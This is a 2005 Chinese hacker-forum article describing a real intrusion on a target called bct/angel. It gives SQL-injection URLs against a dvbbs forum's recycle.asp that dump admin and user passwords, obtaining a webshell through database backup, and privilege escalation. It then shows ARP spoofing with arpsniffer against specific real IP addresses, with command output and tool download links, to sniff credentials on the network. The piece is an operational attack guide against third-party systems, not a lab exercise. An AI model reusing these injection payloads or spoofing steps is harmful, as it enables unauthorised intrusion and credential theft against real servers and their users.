| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

渗透bct/angel    热     ★★★ 【字体：小 大】
渗透bct/angel
作者：蓝色光芒    文章来源：CnXHacker.Net    点击数：    更新时间：2005-11-18
一、踩点:   主站有漏洞的几率太小，就不看了，所有首先检测bct所在的网段，寻找可以突破的2000/2003的机器。   一般都应该找bct附近的ip,不然不在一个交换机内。随便扫一下 比如61.139.126.125，这个服务器可以找到一个可以提权的dvbbs.   二、获得webshell   用工具提前台，用回收站爆后台。转一下linzi的方法：   http://www.xxx.com/bbs/recycle.asp?tablena...dv_bbs1&page=48 爆后台明文密码   http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆管理员密码   http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户密码   http://www.xxx.com/bbs/recycle.asp?tablena...0from%20dv_bbs1 爆用户认证密码   进到后台后，备份就可以得到shell。然后老路子，su提权，运气好的时候jet也不用，   登上3389后用小榕WinArpSpoof扫描一下看在不在列表内，如果在就可以用arp欺骗，否则pass.   三、嗅探   进去直接下载arp欺骗包，http://fsb.47555.net/arp.rar,装一下WinPcap_3_1_beta4，个人认为这个版本最为稳定，兼容性好，比3.1的版本都稳定。然后用arpsniffer,arpsniff出错的问题不在讨论之列，详情看linzi的贴：   http://www.eviloctal.com/forum/htm_data/9/0506/12077.html   注意：这里嗅弹得端口最好不要用80等流量大的端口，那样容易导致服务器过载重起，因为我们本来不需要arpsniffer给我什么信息。   C:\>arpsniffer.exe 61.139.126.1 61.139.126.215 5654 c:.txt 0   ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB   www.netXeyes.com 2002, security at vip dot sina.com   Network Adapter 0: Realtek RTL8139 Family PCI Fast Ethernet NIC   Enable IP Router....OK   Get 61.139.126。1 Hardware Address: 00-11-d8-5e-25-71   Get 61.139.126.215 Hardware Address: 00-50-8d-67-1e-2d   Get 61.139.126.125 Hardware Address: 00-50-8d-67-1d-fd   Spoof 61.139.126.215: Mac of 61.139.126.1 ===> Mac of 61.139.126.125   Spoof 61.139.126.1: Mac of 61.139.126.215 ===> Mac of 61.139.126.125   Begin Sniffer.........   四：分析数据   下载 http://fsb.47555.net/iris.rar 安装后，可以选择嗅探21 也可以通过封包过滤来过滤自己想要得信息，这个就看各人需要了，得到自己需要的数据就行。   然后就可以断开3389，睡一觉，醒来就有内容看了。   以后的提升权限什么的，都不在本次讨论了。
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 入侵检测及其对未来网络安全发展的探讨 下一篇文章： 国内大部分网站统计系统存在着严重安全漏洞(Updated Ver)
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				对kappa官方网站的渗透经过 渗透冰兰黑客基地 clbcatq - clbcatq.dll - DL 内网渗透——如何打开突破口 内网渗透----如何打开突破口 网站渗透率已达85.6％ 被篡改 防护先行之在渗透测试中的攻 WEB/SQL分离 利用ODBC注入 两种“BBC”恢复损坏的Linux phpBB = 2.0.17 “signature

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.